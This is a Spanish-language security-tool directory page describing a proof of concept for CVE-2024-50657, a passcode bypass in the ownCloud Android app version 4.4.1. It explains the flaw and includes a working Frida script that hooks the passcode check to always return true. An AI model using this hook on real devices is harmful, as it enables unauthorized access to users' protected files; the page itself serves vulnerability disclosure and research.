Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
Herramientas/GitHubGitHub/sahalll/cve-2024-50657
Seguridad AndroidAnálisis de VulnerabilidadesExplotaciónPruebas de PenetraciónSeguridad Móvil
GitHubsahalll/cve-2024-50657

CVE-2024-50657

Proporciona un exploit de prueba de concepto para CVE-2024-50657, una vulnerabilidad de control de acceso incorrecto en la aplicación Owncloud para Android, que demuestra la omisión del código de acceso mediante el enganche con Frida.

Ver Repositorio
3hace 1 añoAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2024-50657: Control de Acceso Incorrecto en la apk de Owncloud

Un problema en la apk de Owncloud para Android v.4.4.1 permite a un atacante físicamente cercano escalar privilegios a través de la clase PassCodeViewModel, específicamente en el método checkPassCodeIsValid.

Tipo de Vulnerabilidad

Control de Acceso Incorrecto

Proveedor del Producto

Owncloud

Base de Código del Producto Afectado

Owncloud android apk - 4.4.1

Componente Afectado

com.owncloud.android.presentation.security.passcode.PassCodeViewModel

Explotación

Identificar la Clase y el Método Objetivo:

La clase PassCodeViewModel en la aplicación gestiona la lógica de verificación del código de acceso. El método checkPassCodeIsValid dentro de esta clase es responsable de determinar la validez del código de acceso ingresado.

Enganchar el Método Usando Frida:

Se utiliza un script de Frida para enganchar el método checkPassCodeIsValid en la clase PassCodeViewModel. La implementación del método se modifica para que siempre devuelva verdadero, evitando la validación real del código de acceso.

Ejecución:

El script de Frida se ejecuta mientras la aplicación está en funcionamiento. Cualquier código de acceso ingresado por el usuario será aceptado como válido, permitiendo el acceso no autorizado.

PoC

Java.perform(function() { // Locate the PassCodeViewModel class in the target application var PassCodeActivity = Java.use('com.owncloud.android.presentation.security.passcode.PassCodeViewModel');

// Hook the checkPassCodeIsValid method to modify its behavior PassCodeActivity.checkPassCodeIsValid.implementation = function(passcode) {

// Bypass the actual passcode check by always returning true return true;

};

});

Enlace del video PoC : https://drive.google.com/drive/folders/1C-ZYjYhmKRGvWs9YN51XOiAS2WxxwdQd?usp=sharing

Impacto:-

Esta vulnerabilidad es una vulnerabilidad de omisión de seguridad del lado del cliente. Afecta a los usuarios de la aplicación que dependen de la función de código de acceso para proteger datos sensibles o restringir el acceso a ciertas funcionalidades de la aplicación. Al explotar esta vulnerabilidad, un atacante puede omitir la verificación del código de acceso y obtener acceso no autorizado a áreas de la aplicación que deberían estar protegidas, exponiendo potencialmente datos del usuario o permitiendo acciones no autorizadas dentro de la aplicación.

Descargar herramienta